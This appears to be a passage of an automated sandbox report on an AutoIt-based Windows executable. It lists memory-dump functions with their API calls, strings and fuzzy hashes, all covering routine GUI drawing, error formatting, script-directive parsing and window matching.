Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: ee7fd6085e065652f4699451613750255849e271ead3be3450bad15eab084e58
Instruction ID: 3585bbcdeb2fec3eb005ebec7b8aa5a4cd496a6901b38c29541709c4801dbbf4
Opcode Fuzzy Hash: ee7fd6085e065652f4699451613750255849e271ead3be3450bad15eab084e58
Instruction Fuzzy Hash: 6CE02073C10505AF42106B38EC0D8EA7B5C9F05335F100755F836E21F0E7745D8496D5

Uniqueness

Uniqueness Score: -1.00%

Function 00E1A06A, Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E29468,?,00E3FB84,?), ref: 00E1A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E29468,?,00E3FB84,?), ref: 00E1A0A9

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 9e5b3a1d5a57e39ab9274cc9546881d40a6096e2f4069d712044742ebe93ae4b
Instruction ID: 78855433fe58a921e30b9bab23832cfadff49fd7c82547baa4b2ee0785d9e6a7
Opcode Fuzzy Hash: 9e5b3a1d5a57e39ab9274cc9546881d40a6096e2f4069d712044742ebe93ae4b
Instruction Fuzzy Hash: D8F0823550522DEBDB21AFA5CC48FFA776CFF08361F004165F919E6191D6709944CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DDA155, Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00DD8D57,?,?,?,00000001), ref: 00DDA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00DDA163

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0eb0746b939d59aeedf565d32440053b35c0eb4a0b298a62c7f324eed1475b48
Instruction ID: f42cc8ec042260f591367339f9d523db20d354d0f2eb9090a102c65dee20de75
Opcode Fuzzy Hash: 0eb0746b939d59aeedf565d32440053b35c0eb4a0b298a62c7f324eed1475b48
Instruction Fuzzy Hash: 44B0923145420CAFCA002B92EC0DB8A3F68EB45AA2F404020F60D95060CB6254548A91

Uniqueness

Uniqueness Score: -1.00%

Function 00DC8808, Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418dde24bf2506d71befbedcd052b26f1e315ab56497c172b389ff3c1d362f36
Instruction ID: 362e5d37ad3d8d058d612d81b01e3d41e6f4c319f6cc48e4e0bea615d7052ad4
Opcode Fuzzy Hash: 418dde24bf2506d71befbedcd052b26f1e315ab56497c172b389ff3c1d362f36
Instruction Fuzzy Hash: CA2203316045178BDF288A58C494F7EB7A1FF41344F28806ED982EB5D2DF709DD2EA61

Uniqueness

Uniqueness Score: -1.00%

Function 00E3A5DA, Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00E3A630
GetSysColorBrush.USER32(0000000F), ref: 00E3A661
GetSysColor.USER32(0000000F), ref: 00E3A66D
SetBkColor.GDI32(?,000000FF), ref: 00E3A687
SelectObject.GDI32(?,00000000), ref: 00E3A696
InflateRect.USER32(?,000000FF,000000FF), ref: 00E3A6C1
GetSysColor.USER32(00000010), ref: 00E3A6C9
CreateSolidBrush.GDI32(00000000), ref: 00E3A6D0
FrameRect.USER32 ref: 00E3A6DF
DeleteObject.GDI32(00000000), ref: 00E3A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00E3A731
FillRect.USER32 ref: 00E3A763
GetWindowLongW.USER32(?,000000F0), ref: 00E3A78E

Part of subcall function 00E3A8CA: GetSysColor.USER32(00000012), ref: 00E3A903
Part of subcall function 00E3A8CA: SetTextColor.GDI32(?,?), ref: 00E3A907
Part of subcall function 00E3A8CA: GetSysColorBrush.USER32(0000000F), ref: 00E3A91D
Part of subcall function 00E3A8CA: GetSysColor.USER32(0000000F), ref: 00E3A928
Part of subcall function 00E3A8CA: GetSysColor.USER32(00000011), ref: 00E3A945
Part of subcall function 00E3A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E3A953
Part of subcall function 00E3A8CA: SelectObject.GDI32(?,00000000), ref: 00E3A964
Part of subcall function 00E3A8CA: SetBkColor.GDI32(?,00000000), ref: 00E3A96D
Part of subcall function 00E3A8CA: SelectObject.GDI32(?,?), ref: 00E3A97A
Part of subcall function 00E3A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00E3A999
Part of subcall function 00E3A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E3A9B0
Part of subcall function 00E3A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00E3A9C5
Part of subcall function 00E3A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E3A9ED

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 3bd353f994607974825263f45f39b6778ef5ffc24ed424b5fa81b219df2c8bf3
Instruction ID: 627fbbaba8fac39650c61dd8498581e345f63ec0ae9d2e3101a6947156159ea0
Opcode Fuzzy Hash: 3bd353f994607974825263f45f39b6778ef5ffc24ed424b5fa81b219df2c8bf3
Instruction Fuzzy Hash: 6B918D72408305BFC7109F65DC4CA6B7FB9FF88321F141A2AF5A2A61A1D771D948CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2C18, Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00DB2CA2
DeleteObject.GDI32(00000000), ref: 00DB2CE8
DeleteObject.GDI32(00000000), ref: 00DB2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00DB2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00DB2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00DEC43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00DEC474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DEC89D

Part of subcall function 00DB1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DB2036,?,00000000,?,?,?,?,00DB16CB,00000000,?), ref: 00DB1B9A

SendMessageW.USER32(?,00001053), ref: 00DEC8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DEC8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00DEC907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00DEC912

Strings

0, xrefs: 00DEC731

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: acf2010c09f5f05a1592830bb10754f881c2d5e8d963daf068b258ad81d1f0bc
Instruction ID: 90ec7a5a6481dc21bf9a47d492c2fa1f0ff801698cffda406eaea00f61112d1b
Opcode Fuzzy Hash: acf2010c09f5f05a1592830bb10754f881c2d5e8d963daf068b258ad81d1f0bc
Instruction Fuzzy Hash: 9C128B31610241EFDB25EF25C888BA9BBE1FF05301F585569E896DB262C731E846CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB68DC, Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE

__wcsnicmp.LIBCMT ref: 00DB6931
__wcsnicmp.LIBCMT ref: 00DB6949
__wcsnicmp.LIBCMT ref: 00DB6961
__wcsnicmp.LIBCMT ref: 00DB6979
__wcsnicmp.LIBCMT ref: 00DB6991
__wcsnicmp.LIBCMT ref: 00DB69A9
__wcsnicmp.LIBCMT ref: 00DB69C1
__wcsnicmp.LIBCMT ref: 00DB69D5
__wcsnicmp.LIBCMT ref: 00DB6A16
__wcsnicmp.LIBCMT ref: 00DB6A2A
__wcsnicmp.LIBCMT ref: 00DB6A3E
__wcsnicmp.LIBCMT ref: 00DB6A52

Strings

#comments-start, xrefs: 00DB69BB, 00DB6A10
Unterminated group of comments, xrefs: 00DEE403
Bad directive syntax error, xrefs: 00DEE31A
#OnAutoItStartRegister, xrefs: 00DB6973
#ce, xrefs: 00DB6A4C
Cannot parse #include, xrefs: 00DEE3F0
#include-once, xrefs: 00DB698B
#requireadmin, xrefs: 00DB695B
#pragma compile, xrefs: 00DB692B
#include, xrefs: 00DB69A3
#comments-end, xrefs: 00DB6A38
#notrayicon, xrefs: 00DB6943
#cs, xrefs: 00DB69CF, 00DB6A24

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __wcsnicmp$_malloc
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2350238924-86951937
Opcode ID: 0ebc4bc860a5a3716977d97cccf653584485affe70ec1dc6b20c1a4756ce5051
Instruction ID: 1f603dd871c51acd56765b4576f1c972f49638126f3903ceb9b611691d39ea80
Opcode Fuzzy Hash: 0ebc4bc860a5a3716977d97cccf653584485affe70ec1dc6b20c1a4756ce5051
Instruction Fuzzy Hash: A98104B0640305FACF20BB65EC42FFE7768EF05700F084029F946AA296EB65DA55D6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00E3A8CA, Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00E3A903
SetTextColor.GDI32(?,?), ref: 00E3A907
GetSysColorBrush.USER32(0000000F), ref: 00E3A91D
GetSysColor.USER32(0000000F), ref: 00E3A928
CreateSolidBrush.GDI32(?), ref: 00E3A92D
GetSysColor.USER32(00000011), ref: 00E3A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E3A953
SelectObject.GDI32(?,00000000), ref: 00E3A964
SetBkColor.GDI32(?,00000000), ref: 00E3A96D
SelectObject.GDI32(?,?), ref: 00E3A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00E3A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E3A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00E3A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E3A9ED
GetWindowTextW.USER32 ref: 00E3AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00E3AA32
DrawFocusRect.USER32 ref: 00E3AA3D
GetSysColor.USER32(00000011), ref: 00E3AA4B
SetTextColor.GDI32(?,00000000), ref: 00E3AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E3AA67
SelectObject.GDI32(?,00E3A5FA), ref: 00E3AA7E
DeleteObject.GDI32(?), ref: 00E3AA89
SelectObject.GDI32(?,?), ref: 00E3AA8F
DeleteObject.GDI32(?), ref: 00E3AA94
SetTextColor.GDI32(?,?), ref: 00E3AA9A
SetBkColor.GDI32(?,?), ref: 00E3AAA4

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 8db46c84e54c1e69446bc9a9d28388ccb8d70bdad2921b57938a5c2d31857573
Instruction ID: 6d259beee1520b2dbe4cb28be40e5f55fe999031ea52bc1ed38a80a0ff759104
Opcode Fuzzy Hash: 8db46c84e54c1e69446bc9a9d28388ccb8d70bdad2921b57938a5c2d31857573
Instruction Fuzzy Hash: A5512971D01208BFDB119FA5EC4CEAEBFB9EB48320F154226F911BB2A1D6719944DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00DB27D9, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE

SystemParametersInfoW.USER32 ref: 00DB28BC
GetSystemMetrics.USER32 ref: 00DB28C4
SystemParametersInfoW.USER32 ref: 00DB28EF
GetSystemMetrics.USER32 ref: 00DB28F7
GetSystemMetrics.USER32 ref: 00DB291C
SetRect.USER32 ref: 00DB2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00DB2949
CreateWindowExW.USER32 ref: 00DB297C
SetWindowLongW.USER32 ref: 00DB2990
GetClientRect.USER32 ref: 00DB29AE
GetStockObject.GDI32(00000011), ref: 00DB29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00DB29D5

Part of subcall function 00DB2344: GetCursorPos.USER32(?,?,00E757B0,?,00E757B0,00E757B0,?,00DB1283,00000000,00000002,00000000), ref: 00DB2357
Part of subcall function 00DB2344: ScreenToClient.USER32 ref: 00DB2374
Part of subcall function 00DB2344: GetAsyncKeyState.USER32(00000001), ref: 00DB2399
Part of subcall function 00DB2344: GetAsyncKeyState.USER32(00000002), ref: 00DB23A7

SetTimer.USER32(00000000,00000000,00000028,Function_00001256), ref: 00DB29FC

Strings

AutoIt v3 GUI, xrefs: 00DB2974

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer_malloc
String ID: AutoIt v3 GUI
API String ID: 1557154100-248962490
Opcode ID: 61577ac9bd2c5f96da23c2564f14b047639bc67bf105bf51581fb69b5e9b7b02
Instruction ID: 59548e7f3590742c065e7ed6adfa40dd723078a677a362ba8d8bcca050277631
Opcode Fuzzy Hash: 61577ac9bd2c5f96da23c2564f14b047639bc67bf105bf51581fb69b5e9b7b02
Instruction Fuzzy Hash: F6B16072A00249EFDB14DFA9DC49BEE7BB4FB08311F104129FA16A72A0DB74D845CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E3C5FE, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623

DragQueryPoint.SHELL32(?,?), ref: 00E3C627

Part of subcall function 00E3AB37: ClientToScreen.USER32(?,?), ref: 00E3AB60
Part of subcall function 00E3AB37: GetWindowRect.USER32 ref: 00E3ABD6
Part of subcall function 00E3AB37: PtInRect.USER32(?,?,00E3C014), ref: 00E3ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00E3C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E3C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E3C6BE
_wcscat.LIBCMT ref: 00E3C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E3C705
SendMessageW.USER32(?,000000B0,?,?), ref: 00E3C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00E3C735
SendMessageW.USER32(?,000000B1,?,?), ref: 00E3C757
DragFinish.SHELL32(?), ref: 00E3C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E3C851

Strings

pb, xrefs: 00E3C79B
@GUI_DRAGFILE, xrefs: 00E3C800
@GUI_DROPID, xrefs: 00E3C77E
@GUI_DRAGID, xrefs: 00E3C7C9

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb
API String ID: 169749273-730855631
Opcode ID: db8926226959d87eee2a3e24ee68192f530ffb40292f190dac77ec02ad123a7f
Instruction ID: 7a68da9a3cce3bc7e5c9f53872e0d6985fecc75514b955a4280bb70ef52f3898
Opcode Fuzzy Hash: db8926226959d87eee2a3e24ee68192f530ffb40292f190dac77ec02ad123a7f
Instruction Fuzzy Hash: 3F617F71508304AFC701EF64DC89DABBFE8EF89750F10092EF596A21A1DB70D949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E0ABD4, Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00E0AC33

Strings

[HANDLE:, xrefs: 00E0AC3F
[ALL, xrefs: 00E0ACD9
ALL, xrefs: 00E0ACC7
CLASSNAME=, xrefs: 00E0AC70
ACTIVE, xrefs: 00E0AC0E
[REGEXPTITLE:, xrefs: 00E0AC5B
LAST, xrefs: 00E0ABF8
HANDLE=, xrefs: 00E0AC2C
[LAST, xrefs: 00E0ACE0
[ACTIVE, xrefs: 00E0AC20
[CLASS:, xrefs: 00E0AC83
REGEXP=, xrefs: 00E0AC48

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 85c630b828c5752205607853bb8c493ab2f65d0e1c5e95413e62c4bebedd1966
Instruction ID: 71d56edd3adb4c0fcabbbc8b14eac353ad220096ebb0c9020aad11591d6a6d7f
Opcode Fuzzy Hash: 85c630b828c5752205607853bb8c493ab2f65d0e1c5e95413e62c4bebedd1966
Instruction Fuzzy Hash: 66317231A88309E7DA14FAA0ED43EEEB7A4EB20798F241529F442711D5EE516F44CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00E17D1A, Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00E17D5F
VariantCopy.OLEAUT32(00000000,?), ref: 00E17D68
VariantClear.OLEAUT32(00000000), ref: 00E17D74
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00E17E62
__swprintf.LIBCMT ref: 00E17E92
VarR8FromDec.OLEAUT32(?,?), ref: 00E17EBE
VariantInit.OLEAUT32(?), ref: 00E17F6F
SysFreeString.OLEAUT32(00000016), ref: 00E18003
VariantClear.OLEAUT32(?), ref: 00E1805D
VariantClear.OLEAUT32(?), ref: 00E1806C
VariantInit.OLEAUT32(00000000), ref: 00E180AA

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00E17E8C
Default, xrefs: 00E17F1F

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: d67cb1a0a592ea5749ba7710c5db1f327d6cd693d0268d855573bf76ae18aec1
Instruction ID: e1ec6c36178973402998eabd0cc0c6f274d09ef76d70f702b5501baa891d269b
Opcode Fuzzy Hash: d67cb1a0a592ea5749ba7710c5db1f327d6cd693d0268d855573bf76ae18aec1
Instruction Fuzzy Hash: 14D1E371A08209EBDB109F65D444BFAB7B5FF45B00F24945AE496BB284CB30ECC4DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E19E4A, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00E3FB78), ref: 00E19E91

Part of subcall function 00DB7DE1: _memmove.LIBCMT ref: 00DB7E22

LoadStringW.USER32(?,?,00000FFF,?), ref: 00E19EB3
__swprintf.LIBCMT ref: 00E19F0C
__swprintf.LIBCMT ref: 00E19F25
_wprintf.LIBCMT ref: 00E19FDB
_wprintf.LIBCMT ref: 00E19FF9

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00E19FD6
^ ERROR, xrefs: 00E19F7D
"%s" (%d) : ==> %s:, xrefs: 00E19FF4
Line %d (File "%s"):, xrefs: 00E19F06, 00E19F1F
Error: , xrefs: 00E19FA3
%, xrefs: 00E19E5E

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%
API String ID: 311963372-1048875529
Opcode ID: 19309713b2ae754a57c3757a4ec1c26e345158e842925f2b0c5d8808b9af38b6
Instruction ID: 11d9a8aed82c4c750342b407e84c5db6562e681f4ddbfa95b40166c723c03659
Opcode Fuzzy Hash: 19309713b2ae754a57c3757a4ec1c26e345158e842925f2b0c5d8808b9af38b6
Instruction Fuzzy Hash: 08516032901609EBCF15EBA0DD46EEEBB78EF08300F540165F50A721A2DB316E99DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00E19C38, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00E19C7F

Part of subcall function 00DB7DE1: _memmove.LIBCMT ref: 00DB7E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00E19CA0
__swprintf.LIBCMT ref: 00E19CF9
__swprintf.LIBCMT ref: 00E19D12
_wprintf.LIBCMT ref: 00E19DB9
_wprintf.LIBCMT ref: 00E19DD7

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00E19DB4
Incorrect parameters to object property !, xrefs: 00E19D5B
"%s" (%d) : ==> %s:, xrefs: 00E19DD2
Error: , xrefs: 00E19D81
Line %d (File "%s"):, xrefs: 00E19CF3, 00E19D0C
^ ERROR , xrefs: 00E19D4E

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 6f3509b6d902f7f550eec71cdca5afb6904c6da96c528959ab8b8dceacc71ced
Instruction ID: dda9ce97aff299f1e5975de576126dd59364782a9ecfefd0ded1201af6284d67
Opcode Fuzzy Hash: 6f3509b6d902f7f550eec71cdca5afb6904c6da96c528959ab8b8dceacc71ced
Instruction Fuzzy Hash: 77513C32940609EBCF14EBA0DD56EEEBB78EF14300F500165B50A721A2DB316E99DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00E0F8AA, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00DEE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00E0F8DF
LoadStringW.USER32(00000000,?,00DEE029,00000001), ref: 00E0F8E8

Part of subcall function 00DB7DE1: _memmove.LIBCMT ref: 00DB7E22

